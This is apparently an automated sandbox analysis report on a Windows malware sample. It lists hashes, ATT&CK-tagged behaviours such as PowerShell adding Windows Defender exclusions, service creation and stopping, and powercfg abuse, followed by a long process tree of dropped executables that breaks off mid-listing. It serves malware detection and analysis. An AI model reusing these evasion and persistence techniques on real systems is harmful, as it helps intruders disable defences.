e3fd476c456d416be8a553a87b195b94a74275b7e6ef055709f489dba330520b

Analysis

max time kernel
23s
max time network
127s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
22-12-2024 03:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

JaffaCakes118_e3fd476c456d416be8a553a87b195b94a74275b7e6ef055709f489dba330520b.exe
Size

667.6MB
MD5

704dad032c247ce0ddb037c27ac358c5
SHA1

d2af314d8693db03c2ec0b3cc66ebda55ccf80d2
SHA256

e3fd476c456d416be8a553a87b195b94a74275b7e6ef055709f489dba330520b
SHA512

5a9800431b3bf059c1fbc7d62d05e805f53875c7b63017f1f839497bcff4134b25c39a3649dcddaeb276eadadf27eda0254503b8438d0ddd98cd56dc4920714a
SSDEEP

196608:ceO6VjdBPBa7IwDaLIYSRSMHDeNhFw4F0sT2cQimkTGgQGh7CaLtuU3:cdQdBPBOIw+cYZMcTWw2iTlQG5Caw

Score

8^/10

discovery evasion execution persistence

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2772	powershell.exe
552	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 5 IoCs

pid	Process
2552	hsdfhsdfhdfh.exe
2412	湑兣坑㡶扗8
2828	fdsiojfoidfijo.exe
2252	换湸癢䑺湢z
448	癑兄硗㙑砳癅儸

Loads dropped DLL 3 IoCs

pid	Process
2404	JaffaCakes118_e3fd476c456d416be8a553a87b195b94a74275b7e6ef055709f489dba330520b.exe
2404	JaffaCakes118_e3fd476c456d416be8a553a87b195b94a74275b7e6ef055709f489dba330520b.exe
2404	JaffaCakes118_e3fd476c456d416be8a553a87b195b94a74275b7e6ef055709f489dba330520b.exe

Power Settings 1 TTPs 8 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
1652	powercfg.exe
2672	powercfg.exe
2368	powercfg.exe
1632	powercfg.exe
1524	powercfg.exe
1520	powercfg.exe
592	powercfg.exe
2504	powercfg.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	fdsiojfoidfijo.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\wusa.lock	wusa.exe

Launches sc.exe 14 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2460	sc.exe
1984	sc.exe
2360	sc.exe
532	sc.exe
692	sc.exe
1828	sc.exe
2348	sc.exe
668	sc.exe
2692	sc.exe
1992	sc.exe
1312	sc.exe
2248	sc.exe
1676	sc.exe
2132	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	JaffaCakes118_e3fd476c456d416be8a553a87b195b94a74275b7e6ef055709f489dba330520b.exe

Suspicious behavior: EnumeratesProcesses 15 IoCs

pid	Process
2828	fdsiojfoidfijo.exe
2828	fdsiojfoidfijo.exe
2772	powershell.exe
2828	fdsiojfoidfijo.exe
2828	fdsiojfoidfijo.exe
2828	fdsiojfoidfijo.exe
2828	fdsiojfoidfijo.exe
2828	fdsiojfoidfijo.exe
2828	fdsiojfoidfijo.exe
2828	fdsiojfoidfijo.exe
2828	fdsiojfoidfijo.exe
2828	fdsiojfoidfijo.exe
2828	fdsiojfoidfijo.exe
2828	fdsiojfoidfijo.exe
2828	fdsiojfoidfijo.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	2772	powershell.exe
Token: SeShutdownPrivilege	2504	powercfg.exe
Token: SeShutdownPrivilege	1652	powercfg.exe
Token: SeShutdownPrivilege	2672	powercfg.exe
Token: SeShutdownPrivilege	592	powercfg.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2404 wrote to memory of 2552	2404	JaffaCakes118_e3fd476c456d416be8a553a87b195b94a74275b7e6ef055709f489dba330520b.exe	30
PID 2404 wrote to memory of 2552	2404	JaffaCakes118_e3fd476c456d416be8a553a87b195b94a74275b7e6ef055709f489dba330520b.exe	30
PID 2404 wrote to memory of 2552	2404	JaffaCakes118_e3fd476c456d416be8a553a87b195b94a74275b7e6ef055709f489dba330520b.exe	30
PID 2404 wrote to memory of 2552	2404	JaffaCakes118_e3fd476c456d416be8a553a87b195b94a74275b7e6ef055709f489dba330520b.exe	30
PID 2552 wrote to memory of 2412	2552	hsdfhsdfhdfh.exe	32
PID 2552 wrote to memory of 2412	2552	hsdfhsdfhdfh.exe	32
PID 2552 wrote to memory of 2412	2552	hsdfhsdfhdfh.exe	32
PID 2552 wrote to memory of 2412	2552	hsdfhsdfhdfh.exe	32
PID 2552 wrote to memory of 2696	2552	hsdfhsdfhdfh.exe	33
PID 2552 wrote to memory of 2696	2552	hsdfhsdfhdfh.exe	33
PID 2552 wrote to memory of 2696	2552	hsdfhsdfhdfh.exe	33
PID 2552 wrote to memory of 2696	2552	hsdfhsdfhdfh.exe	33
PID 2552 wrote to memory of 2696	2552	hsdfhsdfhdfh.exe	33
PID 2552 wrote to memory of 2696	2552	hsdfhsdfhdfh.exe	33
PID 2552 wrote to memory of 2972	2552	hsdfhsdfhdfh.exe	34
PID 2552 wrote to memory of 2972	2552	hsdfhsdfhdfh.exe	34
PID 2552 wrote to memory of 2972	2552	hsdfhsdfhdfh.exe	34
PID 2552 wrote to memory of 2972	2552	hsdfhsdfhdfh.exe	34
PID 2552 wrote to memory of 2972	2552	hsdfhsdfhdfh.exe	34
PID 2552 wrote to memory of 2972	2552	hsdfhsdfhdfh.exe	34
PID 2404 wrote to memory of 2828	2404	JaffaCakes118_e3fd476c456d416be8a553a87b195b94a74275b7e6ef055709f489dba330520b.exe	35
PID 2404 wrote to memory of 2828	2404	JaffaCakes118_e3fd476c456d416be8a553a87b195b94a74275b7e6ef055709f489dba330520b.exe	35
PID 2404 wrote to memory of 2828	2404	JaffaCakes118_e3fd476c456d416be8a553a87b195b94a74275b7e6ef055709f489dba330520b.exe	35
PID 2404 wrote to memory of 2828	2404	JaffaCakes118_e3fd476c456d416be8a553a87b195b94a74275b7e6ef055709f489dba330520b.exe	35
PID 2552 wrote to memory of 2916	2552	hsdfhsdfhdfh.exe	36
PID 2552 wrote to memory of 2916	2552	hsdfhsdfhdfh.exe	36
PID 2552 wrote to memory of 2916	2552	hsdfhsdfhdfh.exe	36
PID 2552 wrote to memory of 2916	2552	hsdfhsdfhdfh.exe	36
PID 2552 wrote to memory of 2916	2552	hsdfhsdfhdfh.exe	36
PID 2552 wrote to memory of 2916	2552	hsdfhsdfhdfh.exe	36
PID 2552 wrote to memory of 2924	2552	hsdfhsdfhdfh.exe	40
PID 2552 wrote to memory of 2924	2552	hsdfhsdfhdfh.exe	40
PID 2552 wrote to memory of 2924	2552	hsdfhsdfhdfh.exe	40
PID 2552 wrote to memory of 2924	2552	hsdfhsdfhdfh.exe	40
PID 2552 wrote to memory of 2924	2552	hsdfhsdfhdfh.exe	40
PID 2552 wrote to memory of 2924	2552	hsdfhsdfhdfh.exe	40
PID 2004 wrote to memory of 820	2004	cmd.exe	46
PID 2004 wrote to memory of 820	2004	cmd.exe	46
PID 2004 wrote to memory of 820	2004	cmd.exe	46
PID 2552 wrote to memory of 112	2552	hsdfhsdfhdfh.exe	66
PID 2552 wrote to memory of 112	2552	hsdfhsdfhdfh.exe	66
PID 2552 wrote to memory of 112	2552	hsdfhsdfhdfh.exe	66
PID 2552 wrote to memory of 112	2552	hsdfhsdfhdfh.exe	66
PID 2552 wrote to memory of 112	2552	hsdfhsdfhdfh.exe	66
PID 2552 wrote to memory of 112	2552	hsdfhsdfhdfh.exe	66
PID 2552 wrote to memory of 3056	2552	hsdfhsdfhdfh.exe	67
PID 2552 wrote to memory of 3056	2552	hsdfhsdfhdfh.exe	67
PID 2552 wrote to memory of 3056	2552	hsdfhsdfhdfh.exe	67
PID 2552 wrote to memory of 3056	2552	hsdfhsdfhdfh.exe	67
PID 2552 wrote to memory of 3056	2552	hsdfhsdfhdfh.exe	67
PID 2552 wrote to memory of 3056	2552	hsdfhsdfhdfh.exe	67
PID 2552 wrote to memory of 3040	2552	hsdfhsdfhdfh.exe	68
PID 2552 wrote to memory of 3040	2552	hsdfhsdfhdfh.exe	68
PID 2552 wrote to memory of 3040	2552	hsdfhsdfhdfh.exe	68
PID 2552 wrote to memory of 3040	2552	hsdfhsdfhdfh.exe	68
PID 2552 wrote to memory of 3040	2552	hsdfhsdfhdfh.exe	68
PID 2552 wrote to memory of 3040	2552	hsdfhsdfhdfh.exe	68
PID 2552 wrote to memory of 2076	2552	hsdfhsdfhdfh.exe	69
PID 2552 wrote to memory of 2076	2552	hsdfhsdfhdfh.exe	69
PID 2552 wrote to memory of 2076	2552	hsdfhsdfhdfh.exe	69
PID 2552 wrote to memory of 2076	2552	hsdfhsdfhdfh.exe	69
PID 2552 wrote to memory of 2076	2552	hsdfhsdfhdfh.exe	69
PID 2552 wrote to memory of 2076	2552	hsdfhsdfhdfh.exe	69
PID 2552 wrote to memory of 2252	2552	hsdfhsdfhdfh.exe	70

C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_e3fd476c456d416be8a553a87b195b94a74275b7e6ef055709f489dba330520b.exe
"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_e3fd476c456d416be8a553a87b195b94a74275b7e6ef055709f489dba330520b.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2404
- C:\Users\Admin\AppData\Roaming\hsdfhsdfhdfh.exe
  C:\Users\Admin\AppData\Roaming\hsdfhsdfhdfh.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2552
- - C:\Users\Admin\AppData\Local\Temp\湑兣坑㡶扗8
    "C:\Users\Admin\AppData\Local\Temp\湑兣坑㡶扗8"
    3⤵
    - Executes dropped EXE
    PID:2412
- - C:\Users\Admin\AppData\Local\Temp\湅坄湄㙆砶坅坸z
    "C:\Users\Admin\AppData\Local\Temp\湅坄湄㙆砶坅坸z"
    3⤵
    PID:2696
- - C:\Users\Admin\AppData\Local\Temp\㑇㡑癇挸㘳㜷㘶㜵湺
    "C:\Users\Admin\AppData\Local\Temp\㑇㡑癇挸㘳㜷㘶㜵湺"
    3⤵
    PID:2972
- - C:\Users\Admin\AppData\Local\Temp\㑮稵挵穮䝣Q
    "C:\Users\Admin\AppData\Local\Temp\㑮稵挵穮䝣Q"
    3⤵
    PID:2916
- - C:\Users\Admin\AppData\Local\Temp\扅究穄渳坆儵瘷
    "C:\Users\Admin\AppData\Local\Temp\扅究穄渳坆儵瘷"
    3⤵
    PID:2924
- - C:\Users\Admin\AppData\Local\Temp\扆䝆㡇癸発㙢䝣㍺坺
    "C:\Users\Admin\AppData\Local\Temp\扆䝆㡇癸発㙢䝣㍺坺"
    3⤵
    PID:112
- - C:\Users\Admin\AppData\Local\Temp\㍮㍗㘵䐷㡅3
    "C:\Users\Admin\AppData\Local\Temp\㍮㍗㘵䐷㡅3"
    3⤵
    PID:3056
- - C:\Users\Admin\AppData\Local\Temp\㍗㌶㔸兢㐷湣穣
    "C:\Users\Admin\AppData\Local\Temp\㍗㌶㔸兢㐷湣穣"
    3⤵
    PID:3040
- - C:\Users\Admin\AppData\Local\Temp\㍄湢扣㍇䐵㕆䔸䔵z
    "C:\Users\Admin\AppData\Local\Temp\㍄湢扣㍇䐵㕆䔸䔵z"
    3⤵
    PID:2076
- - C:\Users\Admin\AppData\Local\Temp\换湸癢䑺湢z
    "C:\Users\Admin\AppData\Local\Temp\换湸癢䑺湢z"
    3⤵
    - Executes dropped EXE
    PID:2252
- - C:\Users\Admin\AppData\Local\Temp\换湸癢䑺湢z
    "C:\Users\Admin\AppData\Local\Temp\换湸癢䑺湢z"
    3⤵
    PID:2588
- - C:\Users\Admin\AppData\Local\Temp\癑兄硗㙑砳癅儸
    "C:\Users\Admin\AppData\Local\Temp\癑兄硗㙑砳癅儸"
    3⤵
    - Executes dropped EXE
    PID:448
- - C:\Users\Admin\AppData\Local\Temp\癑兄硗㙑砳癅儸
    "C:\Users\Admin\AppData\Local\Temp\癑兄硗㙑砳癅儸"
    3⤵
    PID:2940
- - C:\Users\Admin\AppData\Local\Temp\䝄㜷穆㐴㙣㌷扢㕸W
    "C:\Users\Admin\AppData\Local\Temp\䝄㜷穆㐴㙣㌷扢㕸W"
    3⤵
    PID:1284
- - C:\Users\Admin\AppData\Local\Temp\䝶㡮㝮穣㍆Q
    "C:\Users\Admin\AppData\Local\Temp\䝶㡮㝮穣㍆Q"
    3⤵
    PID:784
- - C:\Users\Admin\AppData\Local\Temp\确究㕗㝄䕅挵癢
    "C:\Users\Admin\AppData\Local\Temp\确究㕗㝄䕅挵癢"
    3⤵
    PID:2424
- - C:\Users\Admin\AppData\Local\Temp\硅䙆㑆瘶户䝢硸䘶W
    "C:\Users\Admin\AppData\Local\Temp\硅䙆㑆瘶户䝢硸䘶W"
    3⤵
    PID:1476
- - C:\Users\Admin\AppData\Local\Temp\䑣䜸䜴硢穑
    "C:\Users\Admin\AppData\Local\Temp\䑣䜸䜴硢穑"
    3⤵
    PID:2224
- - C:\Users\Admin\AppData\Local\Temp\䙮䝗䘷兇㔵䝣㡸
    "C:\Users\Admin\AppData\Local\Temp\䙮䝗䘷兇㔵䝣㡸"
    3⤵
    PID:2976
- - C:\Users\Admin\AppData\Local\Temp\穗扢䕺戸䙶䑆㙑㝸W
    "C:\Users\Admin\AppData\Local\Temp\穗扢䕺戸䙶䑆㙑㝸W"
    3⤵
    PID:2932
- - C:\Users\Admin\AppData\Local\Temp\穸湇坶䘵典
    "C:\Users\Admin\AppData\Local\Temp\穸湇坶䘵典"
    3⤵
    PID:992
- - C:\Users\Admin\AppData\Local\Temp\穢湸㙑坶捄䑅Q
    "C:\Users\Admin\AppData\Local\Temp\穢湸㙑坶捄䑅Q"
    3⤵
    PID:796
- - C:\Users\Admin\AppData\Local\Temp\䕑充㕺㑆㜸䔷㍶㌶5
    "C:\Users\Admin\AppData\Local\Temp\䕑充㕺㑆㜸䔷㍶㌶5"
    3⤵
    PID:2064
- - C:\Users\Admin\AppData\Local\Temp\䕸㝮㍶䘷㍗
    "C:\Users\Admin\AppData\Local\Temp\䕸㝮㍶䘷㍗"
    3⤵
    PID:2960
- - C:\Users\Admin\AppData\Local\Temp\㡶㠳䝑㝮䔶䔶v
    "C:\Users\Admin\AppData\Local\Temp\㡶㠳䝑㝮䔶䔶v"
    3⤵
    PID:2040
- - C:\Users\Admin\AppData\Local\Temp\㡮㡣䑄㔳湮坮䕅稳
    "C:\Users\Admin\AppData\Local\Temp\㡮㡣䑄㔳湮坮䕅稳"
    3⤵
    PID:2320
- - C:\Users\Admin\AppData\Local\Temp\坺䙄均硸硶
    "C:\Users\Admin\AppData\Local\Temp\坺䙄均硸硶"
    3⤵
    PID:2752
- - C:\Users\Admin\AppData\Local\Temp\坺䙄均硸硶
    "C:\Users\Admin\AppData\Local\Temp\坺䙄均硸硶"
    3⤵
    PID:2420
- - C:\Users\Admin\AppData\Local\Temp\坣䝑儵㡗㙇其E
    "C:\Users\Admin\AppData\Local\Temp\坣䝑儵㡗㙇其E"
    3⤵
    PID:2608
- - C:\Users\Admin\AppData\Local\Temp\㙮䜵戸戵䝸湇湮㔷
    "C:\Users\Admin\AppData\Local\Temp\㙮䜵戸戵䝸湇湮㔷"
    3⤵
    PID:2324
- - C:\Users\Admin\AppData\Local\Temp\㘸扶癣捶坄
    "C:\Users\Admin\AppData\Local\Temp\㘸扶癣捶坄"
    3⤵
    PID:2068
- - C:\Users\Admin\AppData\Local\Temp\㘸扶癣捶坄
    "C:\Users\Admin\AppData\Local\Temp\㘸扶癣捶坄"
    3⤵
    PID:2460
- - C:\Users\Admin\AppData\Local\Temp\㘸扶癣捶坄
    "C:\Users\Admin\AppData\Local\Temp\㘸扶癣捶坄"
    3⤵
    PID:2856
- - C:\Users\Admin\AppData\Local\Temp\典扺硢䕄瘸湄n
    "C:\Users\Admin\AppData\Local\Temp\典扺硢䕄瘸湄n"
    3⤵
    PID:1888
- - C:\Users\Admin\AppData\Local\Temp\兢湅䘸湑㠶戸硆挳
    "C:\Users\Admin\AppData\Local\Temp\兢湅䘸湑㠶戸硆挳"
    3⤵
    PID:2440
- - C:\Users\Admin\AppData\Local\Temp\儷㘶䕣䜴㑮㑗䙑稷䝗F
    "C:\Users\Admin\AppData\Local\Temp\儷㘶䕣䜴㑮㑗䙑稷䝗F"
    3⤵
    PID:1056
- - C:\Users\Admin\AppData\Local\Temp\㕸㝢坢䕣䐳戶F
    "C:\Users\Admin\AppData\Local\Temp\㕸㝢坢䕣䐳戶F"
    3⤵
    PID:772
- - C:\Users\Admin\AppData\Local\Temp\㕶㡣湗㕅湣癮㝗㜸
    "C:\Users\Admin\AppData\Local\Temp\㕶㡣湗㕅湣癮㝗㜸"
    3⤵
    PID:1100
- - C:\Users\Admin\AppData\Local\Temp\戶䑄癆㌶捆㌴兇儴㕑E
    "C:\Users\Admin\AppData\Local\Temp\戶䑄癆㌶捆㌴兇儴㕑E"
    3⤵
    PID:1708
- - C:\Users\Admin\AppData\Local\Temp\湺䘷挴㡢㝅捶
    "C:\Users\Admin\AppData\Local\Temp\湺䘷挴㡢㝅捶"
    3⤵
    PID:2984
- - C:\Users\Admin\AppData\Local\Temp\㑣䙑稶㙇㌷硇㌳戴
    "C:\Users\Admin\AppData\Local\Temp\㑣䙑稶㙇㌷硇㌳戴"
    3⤵
    PID:996
- - C:\Users\Admin\AppData\Local\Temp\㐶䝶㡺挸䕑䙸捅捄䔵Q
    "C:\Users\Admin\AppData\Local\Temp\㐶䝶㡺挸䕑䙸捅捄䔵Q"
    3⤵
    PID:1468
- - C:\Users\Admin\AppData\Local\Temp\㐶䝶㡺挸䕑䙸捅捄䔵Q
    "C:\Users\Admin\AppData\Local\Temp\㐶䝶㡺挸䕑䙸捅捄䔵Q"
    3⤵
    PID:1356
- - C:\Users\Admin\AppData\Local\Temp\瘸癆㘴穑戵硄
    "C:\Users\Admin\AppData\Local\Temp\瘸癆㘴穑戵硄"
    3⤵
    PID:1940
- - C:\Users\Admin\AppData\Local\Temp\癣扺㔷渴穢稸䑄D
    "C:\Users\Admin\AppData\Local\Temp\癣扺㔷渴穢稸䑄D"
    3⤵
    PID:2884
- - C:\Users\Admin\AppData\Local\Temp\㌵湗㍺癸㔳䑗㠴䔴䘵b
    "C:\Users\Admin\AppData\Local\Temp\㌵湗㍺癸㔳䑗㠴䔴䘵b"
    3⤵
    PID:268
- - C:\Users\Admin\AppData\Local\Temp\㌵湗㍺癸㔳䑗㠴䔴䘵b
    "C:\Users\Admin\AppData\Local\Temp\㌵湗㍺癸㔳䑗㠴䔴䘵b"
    3⤵
    PID:316
- - C:\Users\Admin\AppData\Local\Temp\㌷㙢癶䐷䙆稶
    "C:\Users\Admin\AppData\Local\Temp\㌷㙢癶䐷䙆稶"
    3⤵
    PID:388
- - C:\Users\Admin\AppData\Local\Temp\㍸㝇硑兮兺㡮㘵4
    "C:\Users\Admin\AppData\Local\Temp\㍸㝇硑兮兺㡮㘵4"
    3⤵
    PID:2864
- - C:\Users\Admin\AppData\Local\Temp\挴㝸穅㌳捅圴㑆扄㌴
    "C:\Users\Admin\AppData\Local\Temp\挴㝸穅㌳捅圴㑆扄㌴"
    3⤵
    PID:572
- - C:\Users\Admin\AppData\Local\Temp\挷䐷㝇䑺㜷㝢
    "C:\Users\Admin\AppData\Local\Temp\挷䐷㝇䑺㜷㝢"
    3⤵
    PID:2624
- - C:\Users\Admin\AppData\Local\Temp\䙺䑮㔵㙗㑑㘳㍇F
    "C:\Users\Admin\AppData\Local\Temp\䙺䑮㔵㙗㑑㘳㍇F"
    3⤵
    PID:3048
- - C:\Users\Admin\AppData\Local\Temp\䜳䘴㑄㐵䑢兣䘶䘵㕶
    "C:\Users\Admin\AppData\Local\Temp\䜳䘴㑄㐵䑢兣䘶䘵㕶"
    3⤵
    PID:1208
- - C:\Users\Admin\AppData\Local\Temp\䜳䘴㑄㐵䑢兣䘶䘵㕶
    "C:\Users\Admin\AppData\Local\Temp\䜳䘴㑄㐵䑢兣䘶䘵㕶"
    3⤵
    PID:2208
- - C:\Users\Admin\AppData\Local\Temp\砶癣䝇究湇㙆
    "C:\Users\Admin\AppData\Local\Temp\砶癣䝇究湇㙆"
    3⤵
    PID:2256
- - C:\Users\Admin\AppData\Local\Temp\砸瘸䘵㝄硸㕺䔷5
    "C:\Users\Admin\AppData\Local\Temp\砸瘸䘵㝄硸㕺䔷5"
    3⤵
    PID:2168
- - C:\Users\Admin\AppData\Local\Temp\䐳扗䔸瘷㙄湅儳兆㝶
    "C:\Users\Admin\AppData\Local\Temp\䐳扗䔸瘷㙄湅儳兆㝶"
    3⤵
    PID:1904
- - C:\Users\Admin\AppData\Local\Temp\䐳扗䔸瘷㙄湅儳兆㝶
    "C:\Users\Admin\AppData\Local\Temp\䐳扗䔸瘷㙄湅儳兆㝶"
    3⤵
    PID:1252
- - C:\Users\Admin\AppData\Local\Temp\䐳扗䔸瘷㙄湅儳兆㝶
    "C:\Users\Admin\AppData\Local\Temp\䐳扗䔸瘷㙄湅儳兆㝶"
    3⤵
    PID:2164
- - C:\Users\Admin\AppData\Local\Temp\䐵㔵坣确䜸7
    "C:\Users\Admin\AppData\Local\Temp\䐵㔵坣确䜸7"
    3⤵
    PID:1140
- - C:\Users\Admin\AppData\Local\Temp\㠷㙶㙢均圶㍑渴F
    "C:\Users\Admin\AppData\Local\Temp\㠷㙶㙢均圶㍑渴F"
    3⤵
    PID:2348
- - C:\Users\Admin\AppData\Local\Temp\穇㙸㕗扅癮瘵癄䜵硣
    "C:\Users\Admin\AppData\Local\Temp\穇㙸㕗扅癮瘵癄䜵硣"
    3⤵
    PID:2184
- - C:\Users\Admin\AppData\Local\Temp\稴䕅㍆䘶㠴b
    "C:\Users\Admin\AppData\Local\Temp\稴䕅㍆䘶㠴b"
    3⤵
    PID:2264
- - C:\Users\Admin\AppData\Local\Temp\稴䕅㍆䘶㠴b
    "C:\Users\Admin\AppData\Local\Temp\稴䕅㍆䘶㠴b"
    3⤵
    PID:1424
- - C:\Users\Admin\AppData\Local\Temp\䔷䐶䘴坢㑶瘳硄
    "C:\Users\Admin\AppData\Local\Temp\䔷䐶䘴坢㑶瘳硄"
    3⤵
    PID:352
- - C:\Users\Admin\AppData\Local\Temp\䔷䐶䘴坢㑶瘳硄
    "C:\Users\Admin\AppData\Local\Temp\䔷䐶䘴坢㑶瘳硄"
    3⤵
    PID:2816
- - C:\Users\Admin\AppData\Local\Temp\䕆䑮䑗㑆䑇捣㠵均㑣
    "C:\Users\Admin\AppData\Local\Temp\䕆䑮䑗㑆䑇捣㠵均㑣"
    3⤵
    PID:2896
- - C:\Users\Admin\AppData\Local\Temp\䕆䑮䑗㑆䑇捣㠵均㑣
    "C:\Users\Admin\AppData\Local\Temp\䕆䑮䑗㑆䑇捣㠵均㑣"
    3⤵
    PID:2628
- - C:\Users\Admin\AppData\Local\Temp\㜳䙣坆䜸典F
    "C:\Users\Admin\AppData\Local\Temp\㜳䙣坆䜸典F"
    3⤵
    PID:2616
- - C:\Users\Admin\AppData\Local\Temp\㜳䙣坆䜸典F
    "C:\Users\Admin\AppData\Local\Temp\㜳䙣坆䜸典F"
    3⤵
    PID:2748
- - C:\Users\Admin\AppData\Local\Temp\㜳䙣坆䜸典F
    "C:\Users\Admin\AppData\Local\Temp\㜳䙣坆䜸典F"
    3⤵
    PID:556
- - C:\Users\Admin\AppData\Local\Temp\㜶捄儴㝑挸捺㜵
    "C:\Users\Admin\AppData\Local\Temp\㜶捄儴㝑挸捺㜵"
    3⤵
    PID:3064
- - C:\Users\Admin\AppData\Local\Temp\坄瘷戶㔳㝗硅㕇㑗F
    "C:\Users\Admin\AppData\Local\Temp\坄瘷戶㔳㝗硅㕇㑗F"
    3⤵
    PID:1716
- - C:\Users\Admin\AppData\Local\Temp\圳瘵発硸㌶7
    "C:\Users\Admin\AppData\Local\Temp\圳瘵発硸㌶7"
    3⤵
    PID:1404
- - C:\Users\Admin\AppData\Local\Temp\㘵㕶硶㡅䕮穑㍇
    "C:\Users\Admin\AppData\Local\Temp\㘵㕶硶㡅䕮穑㍇"
    3⤵
    PID:2852
- - C:\Users\Admin\AppData\Local\Temp\㙅㙆穑戶戴㠵䘷䑇D
    "C:\Users\Admin\AppData\Local\Temp\㙅㙆穑戶戴㠵䘷䑇D"
    3⤵
    PID:1964
- - C:\Users\Admin\AppData\Local\Temp\湇㙺䕅捶穆b
    "C:\Users\Admin\AppData\Local\Temp\湇㙺䕅捶穆b"
    3⤵
    PID:2952
- - C:\Users\Admin\AppData\Local\Temp\渴䔶坶䕺㕺㠳䐷
    "C:\Users\Admin\AppData\Local\Temp\渴䔶坶䕺㕺㠳䐷"
    3⤵
    PID:1712
- - C:\Users\Admin\AppData\Local\Temp\充䕢湑湗䙅㝣圴湗D
    "C:\Users\Admin\AppData\Local\Temp\充䕢湑湗䙅㝣圴湗D"
    3⤵
    PID:1200
- - C:\Users\Admin\AppData\Local\Temp\㕆䐳癄䜵儷
    "C:\Users\Admin\AppData\Local\Temp\㕆䐳癄䜵儷"
    3⤵
    PID:1784
- - C:\Users\Admin\AppData\Local\Temp\㔳捸捇䕣癑㝸渴
    "C:\Users\Admin\AppData\Local\Temp\㔳捸捇䕣癑㝸渴"
    3⤵
    PID:2112
- - C:\Users\Admin\AppData\Local\Temp\戶挷稵㕄㡢㕄発䜳8
    "C:\Users\Admin\AppData\Local\Temp\戶挷稵㕄㡢㕄発䜳8"
    3⤵
    PID:920
- - C:\Users\Admin\AppData\Local\Temp\戶挷稵㕄㡢㕄発䜳8
    "C:\Users\Admin\AppData\Local\Temp\戶挷稵㕄㡢㕄発䜳8"
    3⤵
    PID:1700
- - C:\Users\Admin\AppData\Local\Temp\扄癑㠸㌷㐳
    "C:\Users\Admin\AppData\Local\Temp\扄癑㠸㌷㐳"
    3⤵
    PID:2092
- - C:\Users\Admin\AppData\Local\Temp\㌳㐴㙸㡢䑣㕗z
    "C:\Users\Admin\AppData\Local\Temp\㌳㐴㙸㡢䑣㕗z"
    3⤵
    PID:1196
- - C:\Users\Admin\AppData\Local\Temp\㐵㕣㕢㙇湆㐶稶坅7
    "C:\Users\Admin\AppData\Local\Temp\㐵㕣㕢㙇湆㐶稶坅7"
    3⤵
    PID:1960
- - C:\Users\Admin\AppData\Local\Temp\癄㕺㌸捺硺
    "C:\Users\Admin\AppData\Local\Temp\癄㕺㌸捺硺"
    3⤵
    PID:2172
- - C:\Users\Admin\AppData\Local\Temp\癄㕺㌸捺硺
    "C:\Users\Admin\AppData\Local\Temp\癄㕺㌸捺硺"
    3⤵
    PID:1828
- - C:\Users\Admin\AppData\Local\Temp\癇块癣穗㙅㐴6
    "C:\Users\Admin\AppData\Local\Temp\癇块癣穗㙅㐴6"
    3⤵
    PID:2732
- - C:\Users\Admin\AppData\Local\Temp\䜴䔵硢儴䝑㍶兣㑢
    "C:\Users\Admin\AppData\Local\Temp\䜴䔵硢儴䝑㍶兣㑢"
    3⤵
    PID:2636
- - C:\Users\Admin\AppData\Local\Temp\䝅䕇穗癣圵
    "C:\Users\Admin\AppData\Local\Temp\䝅䕇穗癣圵"
    3⤵
    PID:2772
- - C:\Users\Admin\AppData\Local\Temp\㍆䑸㝆䐸癢䝸c
    "C:\Users\Admin\AppData\Local\Temp\㍆䑸㝆䐸癢䝸c"
    3⤵
    PID:2776
- - C:\Users\Admin\AppData\Local\Temp\挴硅㔴兑㠳䙄瘸䑅
    "C:\Users\Admin\AppData\Local\Temp\挴硅㔴兑㠳䙄瘸䑅"
    3⤵
    PID:1116
- - C:\Users\Admin\AppData\Local\Temp\捗挶㐶㌳㕸
    "C:\Users\Admin\AppData\Local\Temp\捗挶㐶㌳㕸"
    3⤵
    PID:2824
- - C:\Users\Admin\AppData\Local\Temp\䙄挴䝺䑸䘸䙗8
    "C:\Users\Admin\AppData\Local\Temp\䙄挴䝺䑸䘸䙗8"
    3⤵
    PID:1372
- - C:\Users\Admin\AppData\Local\Temp\䘳㑣䙶㙅兗䐶㡢㙮
    "C:\Users\Admin\AppData\Local\Temp\䘳㑣䙶㙅兗䐶㡢㙮"
    3⤵
    PID:2472
- - C:\Users\Admin\AppData\Local\Temp\䘳㑣䙶㙅兗䐶㡢㙮
    "C:\Users\Admin\AppData\Local\Temp\䘳㑣䙶㙅兗䐶㡢㙮"
    3⤵
    PID:2828
- - C:\Users\Admin\AppData\Local\Temp\穑㕄䔷㐵挶穮㙺湄㡅W
    "C:\Users\Admin\AppData\Local\Temp\穑㕄䔷㐵挶穮㙺湄㡅W"
    3⤵
    PID:3012
- - C:\Users\Admin\AppData\Local\Temp\硄㔸坺究㝮䐴b
